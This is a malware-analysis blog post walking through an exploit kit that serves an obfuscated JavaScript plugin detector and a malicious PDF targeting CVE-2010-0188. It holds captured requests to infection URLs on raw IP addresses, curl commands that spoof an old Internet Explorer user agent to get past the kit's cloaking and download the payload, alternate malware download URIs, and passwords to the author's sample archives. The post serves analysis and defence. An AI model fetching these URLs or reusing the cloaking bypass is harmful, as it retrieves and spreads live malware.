Hello again loyal readers!
I have a treat for you. I encountered an exploit kit while doing my malware thing and decided to try and get a better idea of what is going on start to finish.
I Watched a machine get exploited and fired up WireShark to watch:
GET http://220.127.116.11/2b01554de28f018745855a41166494db/lately-duplicate.php HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml+xml, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, (value not set), pronto/1.00.00, */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; InfoPath.2; .NET CLR 1.1.4322; InfoPath.1; MS-RTC LM 8)
http://18.104.22.168/2b01554de28f018745855a41166494db/lately-duplicate.php is the infection URL
First thing you notice is if you try and visit the page with wget or lynx or curl, you get nothing:
joe@gironsec:~$ curl http://22.214.171.124/2b01554de28f018745855a41166494db/lately-duplicate.php
if you’re clever though, you’ll set the user agent string to something like oh i dont know, IE 5 and hope for the best:
joe@gironsec:~$ curl –user-agent “Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)” http://126.96.36.199/2b01554de28f018745855a41166494db/lately-duplicate.php|less
This returns a java script file.
Here is the file:
Oh shoot, its encrypted. But fear not, we can decrypt this easily. How?
Just replace the eval function with document.write!
here it is prettified:darkleech_decrypted
the code is a plugin detector for pdf files.
What stood out for me was the following:
breeding – lecture.php ? oocSsS = 2j2e542g53 & VMTIP = k & wuabRuEXEygOen = 2g55562e312f2j2j3155 & bHXKmoLg = 2d2b2d2b2d2b2d
These are GET request values.
When I curl’d the site with these values, it sent me a file:
darkleech_pdf. Since I was being flagged by VirusTotal / WebSense, I’ve password protected the PDF file. the password is ‘gironsec’.
The PDF file (which I didn’t open and neither should you) contained several instances of FlateDecode streams.
A FlateDecode stream is a section of a PDF file that contains something embedded inside. I assumed this was the payload:
41 0 obj<>stream
This one was more interesting to decode.
Broken down, the function does a string combine to form a hex character.
Do decrypt, we do:
The following html file decrypts:
It is here:
Surprise, its encoded!
The shell code, which trying to not look like shellcode is here:
(just did a binary paste into ollydbg and disassembled)
That was a crap load of work just to deliver an exploit. Not only that, I think I failed to disassemble / decrypt the final stage properly. I swear, the black hats are winning the war. They have more time on their hands.
All files here:
password is ‘lolwut’.
The PDF exploit is trying to take advantage of this CVE: CVE-2010-0188.
Alt download malware URI in case they took the main one down:
GET http://188.8.131.52/c032df642295f9d35dee58bb00fd75cd/paintings-jumping.php HTTP/1.1::~~Accept: image/gif, image/jpeg, image/pjpeg, image/pjpeg, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml+xml, */*::~~Accept-Language: en-au::~~User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; InfoPath.2; MS-RTC LM 8; .NET CLR 3.0.4
GET http://184.108.40.206/aa8b7a06fcf440a2dbc0981a2b8837c8/pointer-exhibits.php HTTP/1.1::~~Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml+xml, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*:~~Accept-Language: en-us::~~UA-CPU: x86::~~Accept-Encoding: gzip, deflate::~~User-Agent: Mozilla/4.0 (compatible; MSIE 7.0;